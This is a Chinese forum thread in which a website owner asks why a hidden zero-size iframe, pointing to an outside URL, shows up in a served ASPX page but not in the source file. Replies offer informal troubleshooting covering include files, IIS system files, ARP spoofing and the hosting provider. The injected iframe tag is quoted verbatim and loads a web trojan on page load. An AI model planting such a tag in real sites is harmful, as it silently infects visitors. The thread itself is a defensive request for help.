日期:2014-05-18  浏览次数:20602 次

网站被iframe木马,大家帮帮忙啊
我的网站被人家挂上iframe木马了

我的源文件(info.aspx)中没有 <iframe   src=http://53lo.cn/admin/no.htm   width=20   height=0   frameborder=0> </iframe>   这行代码,

然后把这个文件放到FTP服务器上打开的时候“查看源文件”就能看到这行代码,但是再下载下来看info.aspx文件中还是没有这代码,,请问这是怎么回事啊   大家帮帮忙啊,该怎么解决啊

------解决方案--------------------
找服务器供应商
------解决方案--------------------
有好多种情况,,我最近经常这被这样搞..我给你列一下,,几种情况
1.就是在你的源文件中有这段代码,所以在本地就会有这段代码,,这段代码的意思就不用解释了吧!!width=0和height=0就说明宽高都是0你在页面上是看不见的,src后面的应该就是网马的地址了,,网页加载的时候自动执行这个网马..
2.就是在你的源代码中找不到这段代码,,而本地打开就有,,呵呵!!
你有没有看看你这个页面中的包含文件呀..有可能他把那段代码加到你的包含文件里了.. '

3.就是你看看你的网页中有没有ifram呀.(你自己的)包含的网页中,有没有这段代码,
4.就是iis系统自带文件,,你用一个文件搜索专家,(小软件)去你的c盘下面搜索一下这段代码..找到哪个文件,,因为网页是由iis执行的,,所以如果系统的文件中有了,那你的每一个页面就都有了,
5.如果这几种情况都不是,,那你就是被arp了..arp概念太大了,到现在我还不怎么了解..你去查查吧!!这是我总结了好几个月的经验,,几句话说给你了,你说,,你要是不给我点分,,你过意的去吗??呵呵!!!
------解决方案--------------------
首先应该联系服务商,找解决办法
------解决方案--------------------
关注,被这个问题烦了好久!具说是MS的ifram漏洞,但不知道怎么打这个补丁.熊猫烧香也利用这个漏洞.
------解决方案--------------------
关注ing! 有可能服务器中毒了
------解决方案--------------------
是有木马程序注入了,我以前也见到过。你看你的程序文件里面有没有可疑的文件,哪个文件可以登陆,可以批量还原回来的。
还有一种办法就是一个一个的清。
------解决方案--------------------
最大的可能,网站存在漏洞
------解决方案--------------------
gz